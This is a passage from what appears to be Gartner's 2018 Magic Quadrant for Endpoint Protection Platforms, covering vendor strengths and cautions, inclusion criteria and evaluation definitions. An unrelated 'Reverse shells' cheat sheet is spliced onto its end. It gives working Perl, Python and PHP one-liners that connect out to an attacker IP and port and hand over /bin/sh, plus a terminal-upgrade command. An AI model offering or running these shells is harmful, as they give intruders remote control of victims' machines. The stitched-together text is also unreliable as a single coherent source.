  • Clients that complete the upgrade to ENS v.10.x report only modest performance improvements over the previous v.8.8 client.

Microsoft

Microsoft is unique in the EPP space, as it is the only vendor with the capacity to embed protection features directly into the OS. It has used this advantage to step up its efforts in security with Windows 10 features, improvements to Windows Defender (also known as System Center Endpoint Protection), the addition of Windows Defender Advanced Threat Protection and Windows Defender Security Center.
Windows 10 OS-level features and capabilities available with Windows Enterprise E3 and E5, such as Application Guard, App Locker, Secure Boot, Device Guard, Exploit Guard, Advanced Threat Protection (ATP) and Credential Guard, significantly improve protection against current common threats. However, these protections are not as integrated in previous OS versions.
Overall, Microsoft now provides a broad range of security protections that address a wide spectrum of threats across endpoint, Office 365 and email. The comprehensive solution set will resonate with most organizations’ security requirements, provided their budget stretches to the higher-tier, E5-level subscription.
Microsoft has become the most-asked-about vendor during EPP-related Gartner client inquiry calls, and there is significant interest in using the security capabilities in Windows 10 to reduce security spend with other vendors.
Strengths
  • Over the past two years, Microsoft has made steady improvements in the security solutions available as part of Window 10. A deployment of Windows Defender with Defender ATP can be considered directly competitive with some of the EPP solutions available from other vendors noted in this research.
  • Windows Defender provides file-based protection using signatures and heuristics, along with cloud look-ups to detect newer malware. The cloud look-up and cloud-based ML has dramatically improved Microsoft’s detection accuracy in test results. Defender in Windows 10 will step up to protect clients automatically if a third-party EPP engine fails, is out of date or is disabled.
  • Microsoft’s EDR solution, Defender ATP, leverages Microsoft’s own Azure infrastructure offering to store six months of endpoint data at no extra charge.
  • Microsoft’s Windows Security Research Team benefits from a vast installation of over 1 billion consumer endpoint versions of the antivirus engine and its online system-check utilities, which provide a petri dish of malware samples and IOAs.
Cautions
  • The biggest challenge continues to be the scattered security controls, management servers, reporting engines and dashboards. Microsoft is beginning to center its future management and reporting around the Windows Defender Security Center platform, which is the management interface for the whole Windows Defender suite, including ATP. Microsoft Intune is replacing System Center as the primary management tool.
  • To access advanced security capabilities, organizations need to sign up for the E5 tier subscription, which clients report as being more expensive than competitive EPP and EDR offerings, reducing the solution set’s overall appeal.
  • Microsoft relies on third-party vendors to provide malware prevention, EDR and other functionality on non-Windows platforms, which may lead to disparate visibility and remediation capabilities and additional operational complexities.
  • The advanced security capabilities are only available when organizations migrate to Windows 10. It does much less to address all other Windows platforms currently in operation.

Palo Alto Networks

Palo Alto Networks is still best-known to Gartner clients for its next-generation firewall (NGFW) product line, and this continues to be the main line of introduction to Palo Alto Networks Traps for Gartner clients.
Traps uses a stack of nonsignature detection capabilities, such as ML, static and dynamic analysis, as well as monitoring processes and applications as they are spawned for suspicious activity and events. Suspect files from the endpoint can be tested by Palo Alto Networks WildFire, its cloud-based threat analysis and malware sandboxing platform, which is included with a Traps subscription.
Palo Alto Networks acquired LightCyber in 2017; its behavioral-based analytics technology provides automated detection of suspicious user and entity activity indicative of malware. Traps without LightCyber currently offers limited EDR capabilities, which impacts its execution and vision evaluation in this assessment.
Gartner clients will find Palo Alto Networks Traps most appealing when it can integrate with an existing Palo Alto Networks NGFW deployment.
Strengths
  • Organizations with existing Palo Alto Networks NGFW devices will be good candidates for an integrated deployment.
  • Traps does not rely on signature updates, and although it does use the WildFire platform to perform fast look-ups by file hash, it is able to block malware/ransomware when offline or disconnected from the internet.
  • Traps provides solid exploit prevention and mitigation, which is useful for organizations with a difficult patch management process.
  • There are strong integrations with orchestration and SOC automation vendors such as Splunk, ServiceNow and Phantom.
Cautions
  • There is currently no cloud-based management option; customers must use an on-premises management server.
  • While Traps collects endpoint forensics data, it does not provide any response capabilities or postevent remediation tools. Organizations that do not use a Palo Alto Networks NGFW will need to take a multivendor approach to gain these capabilities.
  • Traps lacks EDR capabilities beyond simple IOC searching, making investigation hard without an additional product.
  • Palo Alto Networks acquired LightCyber in early 2017, but has not yet used the technology to improve the limited detection and response capabilities in Traps.
  • Traps displayed a high rate of false positives in AV-TEST testing between August and October 2017.

Panda Security

Panda Security’s unique value proposition is the classification or attestation of every single executable file and process on a protected endpoint device, and it is the only vendor to include a managed threat hunting service in the base purchase of its EPP. Adaptive Defense 360 is fully cloud managed, and combines EPP and EDR into a single offering and single agent.
The attestation service implements an automatic application whitelisting model, where only trusted and approved applications and processes are able to execute. By offloading the classification and authorization process to the vendor, organizations will have a much better deployment success rate than trying to deploy a manual application control solution.
Panda Security’s cloud-first approach, and the managed services backing the EPP and EDR capabilities, are beginning to increase brand awareness outside of Europe.
Organizations without experienced security staff will find Panda Security a good shortlist candidate for an EPP solution, as will organizations considering managed detection and response solutions that are prepared to replace their incumbent EPP vendor.
Strengths
  • The 100% attestation service can drastically reduce the threat surface of endpoints.
  • Due to the classification of all executable processes, Panda Security is able to provide detailed information on vulnerable versions of applications that are present in the environment.
  • Panda Security’s Adaptive Defense platform was one of the first to combine endpoint protection features with managed EDR capabilities.
  • The price point is extremely attractive when buyers consider the capabilities and managed services that are included.
Cautions
  • The macOS agent is limited to signature-based malware detection, and does not integrate with EDR capabilities, leaving a visibility gap for many organizations.
  • Mind share is still weak across the EPP marketplace, which results in limited RFI/RFP presence within the Gartner client base.
  • File and process classification requires access to Panda’s cloud-platform. Administrators will need to decide the impact this has on an endpoint without internet access; running unclassified executables (albeit scanned and monitored for known IOAs) or blocking until connectivity to Panda is restored.
  • An application control and application whitelisting approach are not suitable for all types of user roles. For example, developers who regularly run and test new software builds locally will need exceptions, and adding exceptions will reduce the overall security benefit of this approach.

SentinelOne

SentinelOne is a part of the new wave of EPP solution providers that have experienced fast growth over the past few years. The cloud-based solution is designed around fully embedded EDR and behavioral protection. SentinelOne was one of the first vendors to offer a ransomware protection guarantee based on its behavioral detection and file journaling features. In 2017, SentinelOne struggled to maintain its mind share and share-of-voice in a crowded market, which impacts the marketing-related assessment criteria across both vision and execution. However, the vendor continued to sign on a broad range of partners and resellers.
SentinelOne is a good prospect to replace or augment existing EPP solutions for any organization looking for a solution with strong protection and visibility.
Strengths
  • SentinelOne’s single agent design provides fully integrated file and advanced behavioral anti-malware, based on its EDR functionality.
  • The management console, including full EDR event recording, can be deployed as cloud-based or an on-premises or hybrid approach, easing installation and increasing scalability.
  • SentinelOne offers endpoint visibility (Windows, Linux, macOS and VDI) for investigative information in real time, and an API to integrate common-format, IOC-based threat feeds.
  • SentinelOne leverages volume shadow copy snapshots to return an endpoint to a previously known good state.
Cautions
  • The most significant challenge that SentinelOne faced in 2017 was the churn in staff roles across product, sales, marketing, and other internal and client-facing groups. Gartner clients reported inconsistent interactions with SentinelOne throughout the year. This negatively impacts on its execution and vision in this assessment.
  • SentinelOne does not offer application whitelisting or leverage the use of sandboxing for suspicious file analysis (local, network or cloud).
  • While SentinelOne offers broad platform support, not all platforms provide the same level of capabilities or response options, which can lead to disparities in overall protection and workflow.
  • Larger organizations with advanced SOCs will find the management console lacking in visibility and workflow capabilities.

Sophos

In March 2017, Sophos acquired Invincea — a Visionary vendor in the 2017 Magic Quadrant for Endpoint Protection Platforms — giving Sophos access to its deep learning ML algorithms.
The Sophos Intercept X product, designed to protect against and recover from the malicious actions related to ransomware and exploits, proved popular with both existing Sophos Endpoint Protection customers and as an augmentation to an incumbent EPP. This momentum continued its increased brand awareness in the enterprise space.
Also included in the Intercept X purchase are Sophos’ EDR-like capabilities — called Root Cause Analysis — and the ML malware detection technology from the acquisition of Invincea was added in late 2017.
Sophos’ cloud-based EPP with the Intercept-X platform is a good fit for organizations that can take advantage of a cloud-based administration platform, and that value strong protection against ransomware and exploit-based attacks over advanced forensic investigation capabilities.
Strengths
  • Intercept X clients report strong confidence in not only protecting against most ransomware, but also the ability to roll back the changes made by a ransomware process that escapes protection.
  • Intercept X is available as a stand-alone agent for organizations that are unable to fully migrate from their incumbent EPP vendor.
  • The exploit prevention capabilities focus on the tools, techniques and procedures that are common in many modern attacks, such as credential theft through Mimikatz.
  • The Sophos Central cloud-based administration console can also manage other aspects of the vendor’s security platform, from a single console, including disk encryption, server protection, firewall, email and web gateways.
  • Root Cause Analysis provides a simple workflow for case management and investigation for suspicious or malicious events.
  • Root Cause Analysis capabilities are available to macOS, along with protection against cryptographic malware.
Cautions
  • Although we credited Sophos for a cloud-first approach last year, it has now made parts of Intercept X available for on-premises customers. This is likely to hamper cloud adoption and extend the time that Sophos manages and maintains separate protection stacks.
  • Root Cause Analysis is not available in Intercept X for clients that use the on-premises version of Sophos Endpoint Protection.
  • Sophos’ primary improvement was the integration of Invincea’s deep learning technology. Beyond that, there has been little in the way of enhancements to the EDR capabilities of the Sophos Endpoint Protection platform in the last 12 months.
  • Sophos does not provide vulnerability reporting; rather, it relies on its mitigation and blocking technologies, so organizations will need to find other ways to prioritize their patch management program.

Symantec

The divestiture of the Veritas business in January 2016 and the acquisition of Blue Coat in August 2016 provided a new executive team with leadership and vision that has refocused the vendor and resulted in an improved execution score in this analysis. In 2017, Symantec successfully released product updates for its traditional products with enhancements and new capabilities, such as deception technologies. In the EDR space, Symantec is the most successful of the traditional EPP vendors, where the Advanced Threat Protection (ATP) product uses the same agent as Symantec Endpoint Protection (SEP).
Throughout 2017, Symantec continued to be the leading vendor mentioned by other vendors as their main competition. Symantec continues to generate growth and increased revenue in both the consumer and enterprise businesses (roughly evenly split 50/50). It continues to lead the market in EPP revenue and market share.
Symantec continues to provide one of the most comprehensive EPPs available in this market, with third-party test scores remaining in the top tier, and has added advanced features to better address the changing threat landscape, becoming the first vendor to combine malware protection, EDR, system hardening and deception capabilities in a single agent.
Symantec has begun the process of migrating its offerings to a cloud-first model, with a hybrid option available to clients that prefer to maintain some of the management capabilities on-premises.
Strengths
  • Symantec seems to have finally found a stable footing with its management team bringing stability across the company.
  • SEP 14 and, most recently, SEP 14.1 have proven to be very stable and efficient on resources. Clients report that the addition of ML and other advanced anti-malware capabilities have improved threat and malicious software detection, and containment.
  • Symantec ATP, its EDR-focused solution, provides good capabilities for detection and response, and existing SEP customers will benefit from its use of the existing SEP agent.
  • Symantec has started to embrace a cloud-first strategy with the introduction of its latest product updates, including SEP Cloud and EDR Cloud, which provide a cloud-based console with feature parity to the on-premises management console.
  • Symantec’s broad deployment across a very large deployment population of both consumer and business endpoints provides it with a very wide view into the threat landscape across many verticals.
Cautions
  • When compared with other vendors in the EPP market, Symantec is still perceived as more complex and resource-intensive to manage.
  • Although Symantec has gained strong traction with its EDR components, the vendor struggles to effectively message the benefits of its single agent approach. Many Gartner clients that use SEP and desire EDR capabilities are initially unaware of the availability of Symantec ATP.
  • Symantec offers a full managed service and managed SOC, which are only attractive when an organization wishes to offload its entire SIEM capability to the vendor. The larger scope of its Managed Security Services (MSS) is expensive when compared to other options from newer vendors that focus on a narrower set of services or features.
  • Symantec customers continue to report inconsistent support experience, even when large organizations are provided with dedicated support personnel. Symantec customers also reported poor client/account manager communication.

Trend Micro

Trend Micro is the third-largest vendor in the EPP market, with products ranging across network, data center and endpoint systems. It has a large worldwide footprint, with more than half of the business coming from Japan and the Americas.
Although the vendor has had a rather unremarkable year from a technology innovation perspective, it ticks boxes for mainstream EPP requirements, particularly for those looking for a comprehensive suite of solutions at an affordable price. Unlike the more visionary participants in this Magic Quadrant, Trend Micro’s EDR solution is delivered as a separate agent to the EPP solution. And while it integrates with additional on-premises products like the Deep Discovery sandbox, it lacks integration with its cloud sandbox, and cannot be managed from Trend Micro’s cloud platform.
One of Trend Micro’s biggest advantages is the vulnerability assessment and virtual patching technology, which uses an IPS engine to detect vulnerabilities, and uses HIPS to create a virtual patch to block the exploitation.
Trend Micro remains a good shortlist candidate for organizations of all sizes.
Strengths
  • Trend Micro participates in a wide range of third-party tests, with good results overall, and the OfficeScan client delivers functionality that other traditional vendors provide in their separate EDR add-on, such as IOA-driven behavioral detection.
  • The virtual patching capabilities can reduce pressure on IT operational teams, allowing them to adhere to a strategic patch management strategy without compromising on security.
  • For customers looking for a single strategic vendor, Trend Micro has strong integration across the endpoint, gateway and network solutions to enable real-time policy updates and posture adjustments.
  • Trend Micro offers managed detection and response services, in its Advanced Threat Assessment Service, to augment the technology with expert analysis and best practices.
Cautions
  • EPP and advanced EDR capabilities such as process visualization for investigation and threat hunting are delivered by separate agents.
  • Although the cloud management and on-premises management consoles for the OfficeScan EPP agent are identical, some organizations may need to continue with on-premises management if they wish to use functions beyond the base EPP, such as EDR.
  • Although more than 50% of its installed base is running the latest product release, a number of Trend Micro customers reporting poor malware detection told Gartner they were unaware of the availability of new products or new capabilities. This is not unique to Trend Micro, it is common across the larger, traditional vendors.
  • There is no macOS support for EDR, leaving a visibility gap for most organizations.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Cisco (AMP for Endpoints)
  • Endgame
  • Fortinet (FortiClient)
  • FireEye (HX Series and Helix)

Dropped

The following vendors appeared in the 2017 Gartner Magic Quadrant for Endpoint Protection Platforms but were not included in this research, due to their specific focus on single segments:
  • 360 Enterprise Security Group. One of the best-known brands of endpoint security in China, 360 Enterprise Security Group provides endpoint protection and other security suite solutions — including web gateway, data loss prevention, and mobile threat defense — that are compliant with Chinese government policy and are good choices for organizations based in China. 
  • AhnLab. With a very large SMB installed base within South Korea, and serving some very large enterprises, AhnLab focus on the Korean, Japanese, Chinese and other Asia/Pacific markets with endpoint protection, mobile security and data loss prevention. 
  • G Data Software. G Data Software is a popular vendor in the DACH region (Germany, Switzerland and Austria) that offers a suite of solutions including endpoint, web gateway and email. Its location and compliance with German data protection regulations provides a “No Backdoor Guarantee” for its solution, and the processing of telemetry takes place solely in Germany. Customers report reliable, local language customer service as a key part of their purchasing decision. 
  • Webroot. Webroot primarily focuses on delivering capabilities to managed service providers and channel partners, which use Webroot as part of a managed service offering including endpoint security, network security, security awareness training and threat intelligence services. Webroot’s technology is embedded in a number of other security vendors’ solutions. 

Inclusion and Exclusion Criteria

Inclusion in this Magic Quadrant was limited to vendors that met these minimum criteria:
  • The majority of detection events must be from the vendor’s own detection technique, and designed, owned and maintained by the vendor itself. Augmenting with an OEM engine is acceptable, provided it is not the primary method of detection.
  • The vendor’s nonconsumer EPP must have participated in independent, well-known, public tests for accuracy and effectiveness within the 12 months prior to 18 November 2017  or be a current participant in the VirusTotal public interface. Examples include Virus Bulletin, AV-TEST, AV-Comparatives, NSS Labs and SE Labs. 
  • The vendor must have more than five named accounts larger than 10,000 seats that use the vendor’s EPP as their sole EPP.
  • The vendor must have a minimum of 500,000 deployed licenses, protecting nonconsumer endpoints, with at least 50,000 of those licenses protecting nonconsumer endpoints within North America.
  • The vendor must satisfy at least 12 of the following “Basic” capabilities, and at least four of the following “Desirable” capabilities:
    • Basic capabilities:
      • Blocks known and unknown file-based malware, without relying on daily signature distribution
      • Detects suspicious and malicious activity based on the behavior of a process
      • Implements protection for common application vulnerabilities and memory exploit techniques
      • Can perform static, on-demand malware detection scans of folders, drives or devices such as USB drives
      • Suspicious event data can be stored in a centralized location, for retrospective IOC/IOA searching/analysis
      • Allows real-time IOC/IOA searching across all endpoints (e.g., file hash, source/destination IP, registry key)
      • Allows remote quarantining of an endpoint, restricting network access to only the EPP management server
      • Automatically updates policies, controls, and new agent/engine versions without connecting directly to the corporate network
      • Continues to collect suspicious event data when outside of the corporate network
      • Detections and alerts include severity and confidence indicators, to aid in prioritization
      • Provides risk-prioritized views based on confidence of the verdict and severity of the incident
      • Displays full process tree, to identify how processes were spawned, for an actionable root cause analysis
      • Automatically quarantines malicious files
      • Identifies changes made by malware, and provides the recommended remediation steps
      • Detects, blocks, and reports attempts to disable or remove the EPP agent
    • Desirable capabilities:
      • Primary EPP console uses a cloud-based, SaaS-style, multitenant infrastructure, and is operated, managed and maintained by the vendor
      • Implements vulnerability shielding (aka virtual patching) for known vulnerabilities in the OS and for non-OS applications
      • Can implement default-deny whitelisting with a vendor maintained “app store”-type approach, and user self-service features
      • Can implement application isolation, to separate untrusted applications from the rest of the system
      • Includes access to a cloud or network-based sandbox that is VM-evasion-aware
      • Includes deception capabilities designed to expose an attacker
      • Vendor itself offers managed detection services, alerting customers to suspicious activity
      • Vendor itself offers managed threat hunting, or managed IOC/IOA searching, for detecting the existence of threats (not via third party or channel)
      • Supports advanced natural-language queries with operators and thresholds (e.g., “Show all machines with new PE >1 week old AND on <2% of Machines OR Unknown”)
      • Provides guided analysis and remediation based on intelligence gathered by the vendor (e.g., “85% of organizations follow these steps”)
      • Provides attribution information and potential motivations behind attacks
      • Can utilize third-party, community and intelligence feeds
      • Allows remote remediation via the management console
      • Includes APIs for integration with SOAR/orchestration for automation

Evaluation Criteria

Ability to Execute

The key Ability to Execute criteria used to evaluate vendors were Product or Service, Overall Viability and Market Responsiveness/Record. The following criteria were evaluated for their contributions to the vertical dimension of the Magic Quadrant:
  • Product or Service: We evaluated the protection and capabilities of the product used by the majority of a vendor’s installed base, and the ability of the vendor to provide timely improvements to its customers. 
  • Overall Viability: This includes an assessment of the financial resources of the company as a whole, moderated by how strategic the EPP business is to the overall company. 
  • Sales Execution/Pricing: We evaluated vendors based on whether satisfaction with their technical training, sales incentives, marketing and product quality, and on their price and packaging strategy relative to other vendors in the market. 
  • Market Responsiveness/Record: We evaluated vendors by their market share in total customer seats under license, and their performance relative to the market and other vendors. 
  • Marketing Execution: We evaluated vendors based on self-reported growth rates in seats under license as a percentage of overall new seat growth for the market, and on the execution of marketing initiatives driving brand awareness and customer satisfaction. 
  • Customer Experience: We evaluated vendors based on reference customers’ satisfaction scores as reported to us in an online survey, and through data collected over the course of over 2,100 endpoint-security-related Gartner client interactions, and through Gartner Peer Insights. 
  • Operations: We evaluated vendors’ resources dedicated to malware research and product R&D, as well as the experience and focus of the executive team. 

Table 1: Ability to Execute Evaluation Criteria

Enlarge Table
Evaluation Criteria
Weighting
Product or Service
High
Overall Viability
High
Sales Execution/Pricing
Medium
Market Responsiveness/Record
High
Marketing Execution
Medium
Customer Experience
High
Operations
Medium
Source: Gartner (January 2018)

Completeness of Vision

The key Completeness of Vision criteria in this analysis were Market Understanding and the sum of the weighted Offering (Product) Strategy scores:
  • Market Understanding: This describes the degree to which vendors understand current and future customer requirements, and have a timely roadmap to provide this functionality. 
  • Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements. 
  • Offering (Product) Strategy: When evaluating vendors’ product offerings, we looked for an approach to product development and delivery that emphasizes market differentiation, functionality, methodology and features as they map to current and future requirements. 
    • Anti-malware protection and detection capabilities: This is the quality, quantity, accuracy and ease of administration of an EPP’s anti-malware technology. It covers the tools required to block file-based malware attacks, detect and prevent fileless malware attacks, and mitigate the risk of OS and application vulnerabilities. We look at test results from various independent testing organizations and data from VirusTotal, and use Gartner client inquiries as guides to the effectiveness of these techniques and implementations against modern malware. 
    • Management capabilities: This is the provision of a centralized, role-centric console or dashboard that enhances the real-time visibility of an organization’s endpoint security state. It provides clearly prioritized alerts and warnings, and provides intuitive administration workflows. Vendors that have delivered a cloud-first model with feature parity to an on-premises management platform are given extra credit, as organizations struggle to maintain visibility and control over endpoints in use by the increasing remote workforce. 
    • Incident prevention and investigation capabilities: This includes the discovery, reporting and prioritization of vulnerabilities present in the environment. We look for vendors that provide educated guidance for customers to investigate incidents, remediate malware infections and provide clear root cause analysis, helping reduce the attack surface. Vendors that focus on lowering the knowledge and skills barrier through guided response tools, and easy to-understand-and-use user interfaces are given extra credit here. 
    • Operational IT: Vendors committed to reducing their customers’ attack surface do so with risk-based, prioritized security state assessments — highlighting known vulnerabilities and misconfigurations. We look for vendors that help their customers understand weaknesses in security posture and process, and those that help audit and measure the impact of security investments. 
    • Supported platforms: Several vendors focus solely on Windows endpoints, but the advanced solutions can also support macOS with near parity on the features delivered in both clients, notably in the activity and event monitoring areas of EDR. 
  • Innovation: We evaluated vendor responses to the changing nature of customer demands. We accounted for how vendors reacted to new threats, invested in R&D and/or pursued a targeted acquisition strategy. 
  • Geographic Strategy: We evaluated each vendor’s ability to support global customers, as well as the number of languages supported. 

Table 2: Completeness of Vision Evaluation Criteria

Enlarge Table
Evaluation Criteria
Weighting
Market Understanding
High
Marketing Strategy
Medium
Sales Strategy
Not Rated
Offering (Product) Strategy
High
Business Model
Not Rated
Vertical/Industry Strategy
Not Rated
Innovation
Medium
Geographic Strategy
Low
Source: Gartner (January 2018)

Quadrant Descriptions

Leaders

Leaders demonstrate balanced and consistent progress and effort in all execution and vision categories. They have broad capabilities in advanced malware protection, and proven management capabilities for large enterprise accounts. However, a leading vendor isn’t a default choice for every buyer, and clients should not assume that they must buy only from vendors in the Leaders quadrant. Some clients believe that Leaders are spreading their efforts too thinly and aren’t pursuing clients’ special needs. Leaders tend to be more cautious and only gradually react to the market when Visionaries challenge the status quo.

Challengers

Challengers have solid anti-malware products, and solid detection and response capabilities that can address the security needs of the mass market. They also have stronger sales and visibility, which add up to a higher execution than Niche Players offer. Challengers are often one or two core capabilities short, or lack a fully converged strategy, which affects their completeness of vision when compared to the Leaders. They are solid, efficient and expedient choices.

Visionaries

Visionaries deliver in the leading-edge features — such as cloud management, managed features and services, enhanced detection or protection capabilities, and strong incident response workflows — that will be significant in the next generation of products, and will give buyers early access to improved security and management. Visionaries can affect the course of technological developments in the market, but they haven’t yet demonstrated consistent execution. Clients pick Visionaries for best-of-breed features.

Niche Players

Niche Players offer solid anti-malware solutions, and basic EDR capabilities, but rarely lead the market in features or function. Some are niche because they service a very specific geographic region or customer size, while some focus on delivering excellence in a specific method or combination of protection capabilities. Niche Players can be a good choice for conservative organizations in supported regions, or for organizations looking to deploy an augmentation to an existing EPP for a “defense in depth” approach.

Context

In the past 12 months, EPP solutions have continued on track to consume features from the EDR market, and some of the traditionally pure-play EDR vendors have continued to bolster their solutions with protection capabilities more often found in EPP (see  “Market Guide for Endpoint Detection and Response Solutions”). 
This trend of playing catch-up from two directions has resulted in a slew of vendors with similar capabilities and with little to differentiate themselves.
Those that do differentiate do so with managed features backed by automation  and human analysts; a focus on cloud-first management and reporting, and improving the operational side of IT with a focus on vulnerability protection and reporting; and, most importantly, pushing full-stack protection for EPP and EDR use cases to organizations of all sizes. 
The new wave of endpoint security vendors was previously considered by risk-averse buyers as complementary to, rather than direct replacements for, traditional EPP. This year, however, Visionary vendors are now gaining traction across all market segments. Although these new-wave vendors attempt to position themselves at a premium price when compared with the renewal costs of a traditional vendor, the sheer volume of vendors in the space makes it a buyer’s market. Heavy discounting is apparent, especially with traditional vendors keen to keep their installed base, and with new-wave vendors that have investors and venture capital firms to please.
Gartner clients should look to vendors that have faster development cycles, providing quicker responses to changing attack trends, and delivering smaller updates that do not need a full uninstall and reinstall. Regardless, organizations should endeavor to upgrade to the latest version as soon as practical; we recommend a minor version upgrade within three months and a major version upgrade within six months.

Market Overview

Testing, Transparency and Evaluation

Malware attacks in early 2017 were seminal to the increased scrutiny on security vendors by the media, independent researchers, and customers and prospects. Gartner’s endpoint protection analyst team received hundreds of inquiries driven by media stories, showing that vendor-client trust is a huge part of any buying decision.
As with previous Magic Quadrants, this year’s inclusion criteria mandate that vendors must have participated in public, independent testing during 2017. Gartner is disappointed with several vendors’ weak participation in standardized tests. There are legitimate complaints about current testing methods and scenarios; however, short of an organization putting a red team together to perform custom-made penetration testing, these tests remain the best indicators of effectiveness, and can be a useful data point to compare trends and performance over time in the same test framework.
Participating in independent tests by AV-Comparatives, AV-TEST, Virus Bulletin and other platforms with public interfaces like VirusTotal demonstrates not only that the products are fit for purpose, but also that the vendor is comfortable with and committed to engaging in a more transparent industry. It’s worth noting that many vendors, from traditional to the new wave, are embracing the shift to a more open community. Solutions from vendors without a long-term commitment to engagement and transparency should be approached with caution.
When evaluating a security solution, it is critical to understand which areas that organizations are currently over- or underinvested in. Gartner provides a simple framework in the Adaptive Security Architecture, which many vendors use to communicate their value and feature set in a simple way. Other frameworks exist for more technical evaluations, and the Mitre ATT&CK 1framework, in particular, is growing in popularity as a way to understand which distinct attack techniques an EPP can prevent or detect. 

EPP, EDR and IT Operations

Successful attacks still make use of known vulnerabilities and weaknesses in an organization’s security policy and device configuration. Even the most damaging and high-profile attacks in 2017 (WannaCry and NotPetya) could have been mitigated or the impact reduced by better IT operations, and by better education and communication from security vendors to their customers. Organizations that suffered despite their growing investment in strong endpoint security capabilities felt let down by their vendors. Many of these clients were dissatisfied when their request for help in recovering was met with, “Well, you should have deployed a patch.” These clients asked Gartner, “If these weaknesses were common knowledge, why didn’t our vendor warn us when they have a presence on all our endpoints?”
The most visionary and leading of vendors in 2018 and 2019 will be those that use the data collected from their EDR capabilities to deliver actionable guidance and advice that is tailored to their clients. Detecting known IOCs and suspicious behavior is only one side of the EPP coin — solutions must detect and proactively alert on weaknesses or vulnerabilities that are being exploited right now, or are likely to be exploited in the future.
The fast-moving nature of attacker tools, techniques and procedures means that an organization’s endpoint security strategy must be continually assessed and adapted (see  “Use a CARTA Strategic Approach to Embrace Digital Business Opportunities in an Era of Advanced Threats”). 
Organizations that are approaching renewal for their incumbent EPP should appraise their current security posture. For example:
  • How effective is our patch management strategy, and do our EPP controls protect against the misuse of vulnerable applications?
  • How fast is our time to resolution of alerts and incidents?
  • Will our staffing level — and the experience of those employees — allow us to take advantage of advanced tools to deliver stronger security capabilities?
  • Should we make a short-term, tactical investment in additional managed services, or switch to a vendor that can provide on-demand managed assistance when we need it?
With a better understanding of current state, organizations can make educated purchasing decisions, based on the features and capabilities that make a difference to them and their security posture. Gartner clients can use the Adaptive Security Architecture framework to assess their capabilities within the protection, detection, response and prediction (see  “Designing an Adaptive Security Architecture for Protection From Advanced Attacks”). 

Evidence

  • Gartner responded to more than 2,100 client inquiries.
  • Gartner conducted an online survey of 129 EPP reference customers in 4Q17.
  • Gartner conducted an online survey of 55 EPP channel references in 4Q17.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria. 
Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products. 
Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel. 
Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness. 
Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities. 
Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on. 
Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis. 

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision. 
Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements. 
Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base. 
Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements. 
Business Model: The soundness and logic of the vendor’s underlying business proposition. 
Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets. 
Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes. 
Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

Reverse shells

Reverse shells

 

1.  perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2.  perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3.  perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'<IP>:<PORT>');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"

 

python reverse shell (recommended)

1. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((” “, ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

and if you want to get full terminal support you have to load more modules into it using this command below :

python -c ‘import pty; pty.spawn(“/bin/sh”)’

php reverse shell

1. php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
2. php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
3. php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
4. php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
